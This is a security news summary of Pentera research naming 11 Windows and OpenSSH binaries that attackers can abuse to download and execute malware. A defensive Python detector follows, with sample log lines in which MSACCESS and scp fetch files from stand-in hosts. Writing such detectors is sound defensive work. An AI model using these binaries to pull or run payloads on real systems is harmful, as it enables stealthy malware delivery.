"LOLBAS in the Wild: 11 Living-Off-The-Land Binaries That Could Be Used for Malicious Purposes"
Researchers have found 11 living-off-the-land binaries and scripts (LOLBAS) that threat actors could abuse for post-exploitation activity. Nir Chako, a security researcher at Pentera, describes LOLBAS as an attack technique that repurposes binaries and scripts already present on the system for malicious ends. Because the activity is carried out by trusted system utilities, it is difficult for security teams to distinguish legitimate use from malicious use.

The cybersecurity company reported discovering nine LOLBAS downloaders and three executors that enable adversaries to download and execute "more robust malware" on infected hosts. The discovered LOLBAS downloaders and executors include MsoHtmEd.exe, Mspub.exe, ProtocolHandler.exe, ConfigSecurityPolicy.exe, InstallUtil.exe, Mshta.exe, Presentationhost.exe, Outlook.exe, MSAccess.exe, scp.exe, and sftp.exe. This article continues to discuss the LOLBAS downloaders and executors that threat actors could abuse for post-exploitation activities.
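One defensive use of the list above, as an added example (not code from the report or from Pentera): a small Python detector that reads process-creation log lines and flags any of the named binaries invoked with a remote URL or an scp/sftp-style remote path on its command line. The `ts|image|parent|cmdline` record format, the remote-source heuristic and the sample lines are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass

# Image names from the report; matched case-insensitively on the file name only.
LOLBAS_BINARIES = {
    "msohtmed.exe", "mspub.exe", "protocolhandler.exe", "configsecuritypolicy.exe",
    "installutil.exe", "mshta.exe", "presentationhost.exe", "outlook.exe",
    "msaccess.exe", "scp.exe", "sftp.exe",
}

# Heuristic (an assumption, not from the report): a remote fetch shows up on the
# command line as an http(s)/ftp URL or as an scp/sftp-style user@host:path spec.
REMOTE_RE = re.compile(r"(?:https?|ftp)://\S+|\S+@\S+:\S+", re.IGNORECASE)

@dataclass
class Alert:
    ts: str
    image: str      # lower-cased file name of the LOLBAS binary
    parent: str     # parent process image, useful for triage
    remote: str     # the URL or remote path that triggered the alert

def parse_event(line: str) -> dict:
    """Parse a constructed 'ts|image|parent|cmdline' process-creation record."""
    ts, image, parent, cmdline = line.rstrip("\n").split("|", 3)
    return {"ts": ts, "image": image, "parent": parent, "cmdline": cmdline}

def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_lolbas(path: str) -> bool:
    return image_name(path) in LOLBAS_BINARIES

def find_remote_fetches(lines):
    """Return an Alert for each listed binary launched with a remote source."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if not is_lolbas(ev["image"]):
            continue  # not one of the listed binaries, ignore
        m = REMOTE_RE.search(ev["cmdline"])
        if m:
            alerts.append(Alert(ev["ts"], image_name(ev["image"]), ev["parent"], m.group(0)))
    return alerts

# Constructed sample events; host names use the reserved .invalid TLD.
SAMPLE_LINES = [
    r"2024-01-01T10:00:00|C:\Windows\System32\mshta.exe|C:\Windows\explorer.exe|mshta.exe C:\Users\alice\report.hta",
    r"2024-01-01T10:00:05|C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE|C:\Windows\explorer.exe|MSACCESS.EXE https://files.example.invalid/report.accde",
    r"2024-01-01T10:00:09|C:\Windows\System32\OpenSSH\scp.exe|C:\Windows\System32\cmd.exe|scp.exe user@host.example.invalid:tool.bin C:\Users\Public\tool.bin",
    r"2024-01-01T10:00:12|C:\Windows\System32\notepad.exe|C:\Windows\explorer.exe|notepad.exe https://intranet.example.invalid/readme.txt",
]

if __name__ == "__main__":
    for a in find_remote_fetches(SAMPLE_LINES):
        print(f"{a.ts} {a.image} (parent {a.parent}) fetched {a.remote}")
```

The mshta line is deliberately not flagged: a local .hta launch has no remote source, so this heuristic covers the downloader role and would need a separate rule for the executor role.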